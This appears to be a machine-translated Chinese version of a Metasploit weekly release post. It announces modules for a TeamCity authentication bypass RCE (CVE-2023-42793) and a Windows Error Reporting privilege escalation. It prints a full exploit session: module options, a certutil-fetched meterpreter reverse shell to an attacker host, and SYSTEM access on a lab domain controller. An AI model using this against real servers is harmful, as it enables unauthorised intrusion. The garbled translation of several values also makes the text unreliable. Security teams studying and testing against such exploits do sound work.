最后更新于2023年10月2日星期一20:33:29 GMT

TeamCity认证绕过和远程代码执行

本周发布的Metasploit包括一个新的模块,用于在JetBrains TeamCity CI/CD服务器中绕过一个关键的身份验证. 2023年之前的所有版本的TeamCity.05.4个国家容易受到这个问题的影响. 该漏洞最初是由SonarSource发现的, Metasploit模块是由Rapid7的首席安全研究员Stephen less开发的,他还发表了一篇技术分析 CVE-2023-42793的攻击者kb. A Rapid7 TeamCity客户咨询 是否发布了具体的减排指导意见.

此漏洞利用对Windows和Linux目标都有效. 使用示例:

msf6 exploit(多/ http / jetbrains_teamcity_rce_cve_2023_42793) > show options 

模块选项(exploit/多/ http / jetbrains_teamcity_rce_cve_2023_42793):

   名称当前设置描述
   ----                     ---------------  --------  -----------
   代理无格式类型为:host:port[]的代理链,类型:主持人:港口][...]
   RHOSTS                    192年.168.159.10是目标主机
   RPORT 8111是目标端口(TCP)
   SSL false否为外出连接协商SSL/TLS
   TEAMCITY_ADMIN_ID 1 yes需要鉴权的管理员账号ID
   TEAMCITY_CHANGE_TIMEOUT 30 yes等待应用更改的超时时间
   VHOST无HTTP服务器虚拟主机


有效载荷选项(cmd/windows/http/x64/meterpreter/reverse_tcp):

   名称当前设置描述
   ----                ---------------  --------  -----------
   EXITFUNC进程是退出技术(接受:", seh, thread, process, none)
   FETCH_COMMAND CERTUTIL yes获取负载的命令(接受:CURL), TFTP, CERTUTIL)
   FETCH_DELETE false yes执行后尝试删除二进制文件
   FETCH_FILENAME      cymQYMMk         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST没有本地IP用于服务负载
   FETCH_SRVPORT 8080 yes用于服务负载的本地端口
   FETCH_URIPATH没有用于服务负载的本地URI
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST                192年.168.250.134 yes监听地址(可以指定接口)
   LPORT 4444是监听端口


开发目标:

   Id  Name
   --  ----
   0的窗户



使用info或info -d命令查看完整模块的信息.

msf6 exploit(多/ http / jetbrains_teamcity_rce_cve_2023_42793) > exploit

[*]启动TCP反向处理程序.168.250.134:4444 
[*]运行自动检查(“设置自动检查false”为禁用)
[+]目标易受攻击. JetBrains TeamCity 2023.05.检测到3 (build 129390).
[*] Token已存在,请删除并生成新的Token.
[*]已创建认证令牌eyJ0eXAiOiAiVENWMiJ9.UUxBSk0zMGk1eWFzRGZRYjg3LWJqWVVrY1Fn.YjU0NmIwYjUtNTZmNC00N2U3LWI4MGItMDdhOTQ0YjIzZGQ5
[*]内部修改.属性以允许创建流程...
[*]等待应用配置更改...
[*]执行负载...
[*]内部复位.属性设置...
[*]发送阶段(200774字节)到192.168.250.237
[*]等待应用配置更改...
[*]删除认证令牌.
[*]计量器第2次会话打开(192.168.250.134:4444 -> 192.168.250.237:65397) at 2023-09-28 13:29:20 -0400

meterpreter > getuid
服务器用户名:NT AUTHORITY) \系统
meterpreter > sysinfo
计算机:DC
操作系统:Windows 2016+.0 Build 17763).
架构:x64
系统语言:en_US
域:MSFLAB
登录用户:9
计量器:x64/windows
meterpreter >

新增模块内容(2)

JetBrains TeamCity未经认证的远程代码执行

作者:sfewer-r7
类型:利用
拉的要求: #18408 提供的 sfewer-r7
Path: 多/ http / jetbrains_teamcity_rce_cve_2023_42793

描述:这为JetBrain的TeamCity服务器在Linux和Windows上添加了一个未经认证的RCE. 远程攻击者可以利用身份验证绕过漏洞,然后在服务上下文中执行操作系统命令.

微软错误报告本地特权提升漏洞

作者:philip dragoviki (Wh04m1001), Octoberfest7和bwatters-r7
类型:利用
拉的要求: #18314 提供的 bwatters-r7
Path: windows /地方/ win_error_cve_2023_36874

描述:这增加了一个利用Windows 10中的目录遍历漏洞的漏洞利用模块. 此漏洞标识为CVE-2023-36874,攻击者可以将权限提升到 NT AUTHORITY) \系统 user. 请注意,此模块适用于Windows 10x64 22H2.

增强功能和特性(1)

  • #18399 from h00die 修正了模块文档中的多个拼写错误.

文档

您可以在我们的网站上找到最新的Metasploit文档 docs.metasploit.com.

Get it

与往常一样,您可以使用 msfupdate
自上一篇博文以来,你可以从
GitHub:

如果你是 git 用户,可以克隆 Metasploit框架 (主分支)为最新.
要安装fresh而不使用git,您可以使用open-source-only 夜间的安装程序 or the
二进制安装程序 (也包括商业版).